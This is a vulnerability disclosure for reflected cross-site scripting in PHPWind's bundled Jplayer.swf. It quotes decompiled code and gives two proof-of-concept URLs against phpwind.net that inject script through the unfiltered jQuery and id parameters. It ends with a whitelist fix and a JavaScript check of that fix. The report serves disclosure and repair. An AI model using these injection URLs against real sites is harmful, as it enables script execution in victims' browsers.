PHPWind uses a lot of Flash files.

1. Vulnerable file: http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf

2. Check the code after decompiling:

    this.jQuery = (((loaderInfo.parameters.jQuery + "('#") + loaderInfo.parameters.id) + "').jPlayer");
    ......
    private function init(_arg1:TimerEvent):void {
        this.myInitTimer.stop();
        if (ExternalInterface.available) {
            ......
            ExternalInterface.call(this.jQuery, "jPlayerFlashEvent", JplayerEvent.JPLAYER_READY, this.extractStatusData(this.commonStatus));
        };
    }

3. In the code above, the jQuery variable is built from loaderInfo.parameters.jQuery and loaderInfo.parameters.id, and is then passed to ExternalInterface.call as the function to call. Neither parameter is filtered.

4. Two PoC URLs can be constructed as follows, one per parameter, so there are two XSS issues (proof of vulnerability):

    http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1)}catch(e){}//
    http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf?id=')}catch(e){alert(1)}//

Solution: Refer to the repair applied to swfupload.swf: replace every character that is not a-zA-Z0-9_ with an empty string.
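The whitelist repair named in the Solution, modelled as an added example (not PHPWind's or jPlayer's code, and written in JavaScript rather than the SWF's ActionScript). The function names and the element id jp_flash_0 are hypothetical; the two hostile values are the ones in the PoC URLs above.

```javascript
// Added example: mirrors the string concatenation from the decompiled SWF
// and applies the a-zA-Z0-9_ whitelist. All names here are hypothetical.

// Fix from the Solution: drop every character outside a-zA-Z0-9_.
// Note this also removes '$' and '.', so the embedding page has to pass
// a plain global name (for example jQuery) and a plain element id.
function sanitizeFlashVar(value) {
  const text = value === undefined || value === null ? '' : String(value);
  return text.replace(/[^a-zA-Z0-9_]/g, '');
}

// Same concatenation as the decompiled code:
//   jQuery + "('#" + id + "').jPlayer"
function buildCallTarget(params, sanitize) {
  const clean = sanitize ? sanitizeFlashVar : (v) => String(v);
  return clean(params.jQuery) + "('#" + clean(params.id) + "').jPlayer";
}

// The only shape the first argument of ExternalInterface.call should have.
const EXPECTED_TARGET = /^[a-zA-Z0-9_]+\('#[a-zA-Z0-9_]+'\)\.jPlayer$/;

function isExpectedTarget(target) {
  return EXPECTED_TARGET.test(target);
}

// Constructed inputs: one normal embed, then the two PoC parameter values.
const samples = [
  { jQuery: 'jQuery', id: 'jp_flash_0' },
  { jQuery: 'alert(1)}catch(e){}//', id: 'jp_flash_0' },
  { jQuery: 'jQuery', id: "')}catch(e){alert(1)}//" },
];

// For each input, compare the unfiltered target with the filtered one.
function audit(list) {
  return list.map((p) => {
    const raw = buildCallTarget(p, false);
    const fixed = buildCallTarget(p, true);
    return { raw, rawOk: isExpectedTarget(raw), fixed, fixedOk: isExpectedTarget(fixed) };
  });
}

console.table(audit(samples));
```

After filtering, both hostile values collapse to plain identifiers, so the call target can no longer close the expression it is placed in.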